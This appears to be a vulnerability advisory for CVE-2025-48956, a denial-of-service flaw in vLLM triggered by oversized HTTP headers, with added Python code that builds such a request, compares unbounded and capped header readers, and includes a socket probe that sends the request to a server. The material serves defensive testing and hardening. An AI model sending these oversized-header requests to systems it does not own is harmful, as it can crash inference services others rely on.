CVE-2025-48956 HIGH

CVE-2025-48956: vLLM API endpoints vulnerable to Denial of Service Attacks

Vendor Vllm-Project
Product vllm
Weakness CWE-400
Published August 21, 2025
Last update August 21, 2025

CVSS base score

7.5/10
Attack vector Network
Attack complexity Low
Privileges required None
User interaction None
Scope Unchanged
Confidentiality None
Integrity None
Availability High

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

What the vulnerability does

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.1.0 up to, but not including, 0.10.1.1, a Denial of Service (DoS) can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. The server's memory is exhausted while it reads the header, which can crash the process or leave it unresponsive. No authentication is required, so any remote client that can reach the endpoint can exploit it. The vulnerability is fixed in 0.10.1.1.
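What "a single GET with an extremely large header" looks like on the wire, and why the cap has to live in the layer that buffers request bytes rather than in the application: the following is an added example, not vLLM project code and not the project's fix. The `X-Filler` header name and the two chunked readers are constructed for illustration (they model a front-end HTTP parser, not uvicorn, h11 or httptools); `probe_header_limit` sends one such request to a server you operate and reports how it answers.

```python
"""Oversized-header DoS pattern (CVE-2025-48956), as an added example.

Not vLLM code. The two readers below are illustrative models of the
buffering layer in an HTTP server: one grows without bound, one caps.
"""
import socket
from typing import Iterator

CRLF = b"\r\n"
HEADER_END = b"\r\n\r\n"


class HeaderTooLarge(Exception):
    """Raised when a request's header block exceeds the configured cap."""


def build_request(header_bytes: int, host: str = "127.0.0.1:8000",
                  path: str = "/v1/models") -> bytes:
    """Build one HTTP/1.1 GET whose single custom header carries
    `header_bytes` bytes of filler. `X-Filler` is a made-up header name."""
    lines = [
        f"GET {path} HTTP/1.1".encode(),
        f"Host: {host}".encode(),
        b"X-Filler: " + b"A" * header_bytes,
    ]
    return CRLF.join(lines) + HEADER_END


def _chunks(data: bytes, size: int) -> Iterator[bytes]:
    """Simulate socket.recv() handing the request over in `size`-byte pieces."""
    for i in range(0, len(data), size):
        yield data[i:i + size]


def read_headers_unbounded(data: bytes, recv_size: int = 4096) -> tuple[bytes, int]:
    """Vulnerable pattern: append to a buffer until the blank line that ends
    the header block arrives. Memory grows with whatever the client sends.
    Returns (header block, peak buffered bytes)."""
    buf = b""
    for chunk in _chunks(data, recv_size):
        buf += chunk
        end = buf.find(HEADER_END)
        if end != -1:
            return buf[:end], len(buf)
    raise ValueError("connection closed before end of headers")


def read_headers_bounded(data: bytes, max_header_bytes: int = 8192,
                         recv_size: int = 4096) -> tuple[bytes, int]:
    """Hardened pattern: enforce the cap while reading, so an unfinished
    header block never holds more than max_header_bytes plus one recv()
    of client-controlled data. Returns (header block, peak buffered bytes)."""
    buf = b""
    for chunk in _chunks(data, recv_size):
        buf += chunk
        end = buf.find(HEADER_END)
        if end != -1:
            if end > max_header_bytes:
                raise HeaderTooLarge(f"header block is {end} bytes > {max_header_bytes}")
            return buf[:end], len(buf)
        if len(buf) > max_header_bytes:
            # Fail fast: drop the connection (a real server answers 431 first).
            raise HeaderTooLarge(f"header block exceeds {max_header_bytes} bytes before completing")
    raise ValueError("connection closed before end of headers")


def probe_header_limit(host: str, port: int, header_bytes: int = 64 * 1024,
                       timeout: float = 5.0) -> str:
    """Send one oversized-header GET to a server you operate and return the
    first response line, or a note if the peer dropped the connection.
    A hardened front end answers 431/400 or closes; an unbounded one keeps
    reading. Keep header_bytes modest: this is a check, not a load test."""
    req = build_request(header_bytes, host=f"{host}:{port}")
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req)
        try:
            first = s.recv(256)
        except socket.timeout:
            return "no response within timeout (server still reading?)"
    if not first:
        return "connection closed by peer without a response"
    return first.split(CRLF, 1)[0].decode(errors="replace")


if __name__ == "__main__":
    big = build_request(1_000_000)
    _, peak = read_headers_unbounded(big)
    print(f"unbounded reader buffered {peak} bytes for one request")
    try:
        read_headers_bounded(big)
    except HeaderTooLarge as exc:
        print(f"bounded reader rejected it: {exc}")
```

Run `probe_header_limit("127.0.0.1", 8000)` only against a deployment you own. Upgrading to 0.10.1.1 is the fix the advisory names; independently of that, a reverse proxy with its own header-size limit in front of the API (for example nginx's `large_client_header_buffers`) rejects such requests before they reach the engine.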

Key dates

Disclosure timeline

August 21, 2025 CVE published
August 21, 2025 Record updated